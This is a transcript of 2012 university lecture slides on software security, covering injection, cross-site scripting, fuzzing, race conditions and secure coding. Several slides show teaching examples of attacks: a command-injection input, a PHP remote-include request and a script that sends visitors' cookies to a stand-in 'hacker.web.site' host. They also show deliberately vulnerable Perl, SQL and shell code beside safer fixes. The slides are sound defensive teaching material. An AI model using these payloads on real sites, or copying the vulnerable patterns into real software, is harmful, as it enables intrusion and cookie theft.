software security

35
Software Security CS461/ECE422 Spring 2012

Upload: semah

Post on 22-Feb-2016

33 views

Category:

Documents


0 download

DESCRIPTION

Software Security. CS461/ECE422 Spring 2012. Reading Material. Chapter 12 of the text. Outline. Review common vulnerabilities in programs Input Checking Program Logic Errors Errors Interacting with the OS Output handling. Software Vulnerabilities. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Software Security

Software Security

CS461/ECE422Spring 2012

Page 2: Software Security

Reading Material

• Chapter 12 of the text

Page 3: Software Security

Outline

• Review common vulnerabilities in programs• Input Checking• Program Logic Errors• Errors Interacting with the OS• Output handling

Page 4: Software Security

Software Vulnerabilities

• Generally a result of poor programming practices.

• OWASP top 10 Web Application Security risks– https://www.owasp.org/index.php/Category:OWA

SP_Top_Ten_Project– A good number are developer bugs

Page 5: Software Security

Security in Design and Architecture

• Security concerns must be considered up front• Security impacts system architecture – Perhaps re-architect to ameliorate security

concerns– Security architecture can be used to drive testing– True even for projects with no “security features”

• Leaving security to the test phase (or later) is not a good idea to say the least

Page 6: Software Security

Defensive Programming or Secure Coding

• Mostly good software engineering– Except when considering security must consider a

malicious actor– Traditional software engineering concentrates

dealing with errors due to accidents• Goal– Continued functioning of software in spite of

unforeseeable usage of said software.• Conflicts with time to market

Page 7: Software Security

Make No Assumptions!

• Don’t assume the user won’t enter more than 512 characters on the command line

• Don’t that there will always be enough disk space

• OR codify and enforce your assumptions

Page 8: Software Security

Handling User Input

• This is where the user (malicious or innocent) can directly impact the program– Always verify the user input– White list expected results

• Input can come from a number of places– Text entry– Configuration files– Environment variables– Network

Page 9: Software Security

Injection Attacks

• Error in input handling that results in unexpected execution flow

• Often occurs in scripting languages– Script writer expects user input to be data– But user inputs text that will be interpreted as

code

Page 10: Software Security

Unsafe Perl Script 1 #!/usr/bin/perl 2 # finger.cgi - finger CGI script using Perl5 CGI module 3 4 use CGI; 5 use CGI::Carp qw(fatalsToBrowser); 6 $q = new CGI; # create query object 7 8 # display HTML header 9 print $q->header,10 $q->start_html('Finger User'),11 $q->h1('Finger User');12 print "<pre>";1314 # get name of user and display their finger details15 $user = $q->param("user");16 print `/usr/bin/finger -sh $user`;1718 # display HTML footer19 print "</pre>";20 print $q->end_html;

Page 11: Software Security

Running Script

• With user = lpb• Finger user

Login Namelpb Lawrie Brown

• With user=‘xxx; echo attack success; ls finger*’• Finger User

attack successfinger.cgi finger.html

• Command injection. Running arbitrary commands at the privilege of the web user id.

Page 12: Software Security

Safer Script

14 # get name of user and display their finger details15 $user = $q->param("user");16 die "The specified user contains illegal characters!"17 unless ($user =~ /^\w+$/);18 print `/usr/bin/finger -sh $user`;

• counter attack by validating input– compare to pattern that rejects invalid input– see example additions to script:

Page 13: Software Security

SQL Injection

• Or why is this XKCD comic funny– http://xkcd.com/327/

Page 14: Software Security

SQL Injection

• another widely exploited injection attack• when input used in SQL query to database– similar to command injection – SQL meta-characters are the concern– must check and validate input for these

$name = $_REQUEST['name'];$query = “SELECT * FROM suppliers WHERE name = '" . $name . "';"$result = mysql_query($query);

$name = $_REQUEST['name'];$query = “SELECT * FROM suppliers WHERE name = '" .

mysql_real_escape_string($name) . "';"$result = mysql_query($query);

Page 15: Software Security

Code Injection

• further variant• input includes code that is then executed– see PHP remote code injection vulnerability• variable + global field variables + remote include

– this type of attack is widely exploited

<?phpinclude $path . 'functions.php';include $path . 'data/prefs.php';

GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

Page 16: Software Security

1604/10/07

Cross Site Scripting (XSS) Goal – Inject malicious code into web pages

viewed by others. Sites that allow HTML formatted user input to be

stored, e.g. Blog comments, wiki entries. Enter the following into a form that then shows

the original query in the response. <script>confirm("Do you hate purple

dinosaurs?");</script>

Page 17: Software Security

XSS Example• cf. guestbooks, wikis, blogs etc• where comment includes script code– e.g. to collect cookie details of viewing users

• need to validate data supplied– including handling various possible encodings

• attacks both input and output handling

Thanks for this information, its great!<script>document.location='http://hacker.web.site/cookie.cgi?'+document.cookie</script>

Page 18: Software Security

Alternate Encodings

Page 19: Software Security

Input Checks

• Example of evading input checks– Samy’s explanation of his Myspace worm– http://namb.la/popular/tech.html

• Canonicalize input before performing checks– Map the multiple versions of ‘A’ to a particular value

• Issue for numeric values too– Is the number 16 bits or 32?– Signed or unsigned?

• Negative number or large positive

Page 20: Software Security

Input Fuzzing• Generate “random” inputs to test programs

– Environment variables– Input strings– Network values

• Could be completely randomized or somewhat structured– Minifuzz– ShareFuzz– Spike– MuDynamics

• Standard component of Microsoft’s Software Development Lifecycle

Page 21: Software Security

More Fuzz - SPIKE• An input language for creating variant network

packets• From WireShark output, make it easy to express new

packets– a_binary(“00 01 02 03”)

Data: <00 01 02 03>– a_block_size_big-endian_word(“Blockname”);

Data: <00 01 02 03 00 00 00 00>– a_block_start(“Blockname”)

a_binary(“05 06 07 08”)Data: <00 01 02 03 00 00 00 00 05 06 07 08>

– a_block_end(“Blockname”);Data: <00 01 02 03 00 00 00 04 05 06 07 08>

Page 22: Software Security

Writing Correct/Safe Code

• Is your algorithm correct?– Incorrect use of random number generators• Bad seeds• E.g. Code Red and Netscape

• TCP session hijacking– How random is the sequence number?

• Leaving in test code– Used by Morris Worm

Page 23: Software Security

Is there a bug in the compiler?

• Ken Thompson Trojan compiler example• Required for higher levels of Common Criteria– Correspondence of design, source, and object

code.

Page 24: Software Security

Correct Use of Memory

• Memory Leak– Run process out of memory. DoS

• Free/Allocation errors– Heap overflow, can enable arbitrary execution

• Could be solved by– Heap randomization– Tools to track heap utilization• Valgrind• Duma

Page 25: Software Security

Race Conditions and Shared Memory

• Multiple threads of control accessing a common memory location– Subtle (and not so subtle) errors in synchronization are

possible– Multiple writers– Writing while another thread is reading– Deadlocks

• Errors vary from invocation to invocation• Attacker could attempt to trigger a latent threading

error

Page 26: Software Security

Environment Variables

• Another way for the program to get input– And should be treated as such

• Generally set up for the user– Sysadmin creates a profile for the user that

initializes the environment• Environment variables read by compiled

programs and scripted program

Page 27: Software Security

Example Vulnerable Scripts• using PATH or IFS environment variables• cause script to execute attackers program with privileges granted

to script– SetUID root scripts would be attractive

• almost impossible to prevent in some form– Though the use of IFS has been restricted in most modern shells

#!/bin/bashuser=`echo $1 | sed 's/@.*$//'`grep $user /var/local/accounts/ipaddrs

#!/bin/bashPATH=”/sbin:/bin:/usr/sbin:/usr/bin”export PATHuser=`echo $1 | sed 's/@.*$//'`grep $user /var/local/accounts/ipaddrs

Page 28: Software Security

Path Attack On Libraries

• Dynamic libraries are loaded at invocation time

• Loader must search the system to find the libraries needed by the executable– LD_LIBRARY_PATH– Flexibility vs attack avenue

Page 29: Software Security

Least Privilege• Ideally run a program with as many privileges and access rights

as it needs but no more– What’s the hard in too much access?

• Root in Unix• Web servers and file access

– What files does the web server process need to read? Need to write?

• How long does a program need special privilege?– E.g., a low port network service program

• Divide program into sets of processes– Move the privilege required elements into smaller, simpler processes

Page 30: Software Security

System Calls andStandard Library Functions

• programs use system calls and standard library functions for common operations– and make assumptions about their operation– if incorrect behavior is not what is expected may

be a result of system optimizing access to shared resources• by buffering, re-sequencing, modifying requests

– can conflict with program goals

Page 31: Software Security

Secure File Shredder

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]open file for writingfor each pattern seek to start of file overwrite file contents with patternclose fileremove file

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]open file for updatefor each pattern seek to start of file overwrite file contents with pattern flush application write buffers sync file system write buffers with deviceclose fileremove file

Page 32: Software Security

Race Conditions

• Files can be used to synchronize access to OS resources between processes

• If [ ! –e $file ]then

touch $fileelse echo “You don’t have the lock”fi

• Time of check to time of use (TOCTOU)

Page 33: Software Security

Temporary Files

• Many programs create temporary intermediate files– Can create unique names based on process id– How could an attacker leverage this?

• do { filename = tempnam(NULL, “foo”); fd = open(filename, ….) free(filename);} while (fd == -1);

Page 34: Software Security

Output Checking

• Example 1– Active display• VT100 command characters• Or X-terminal display hijack

• Example 2– Cross Site Scripting• Generate display from stored data• Data is interpreted as command

Page 35: Software Security

Summary

• Useful to look at common software vulnerabilities– Know common issues to avoid going forward

• Even more important to consider security in the design architecture– More likely to catch/avoid problems if you think

from the security perspective up front– Someone will be thinking from the security

perspective eventually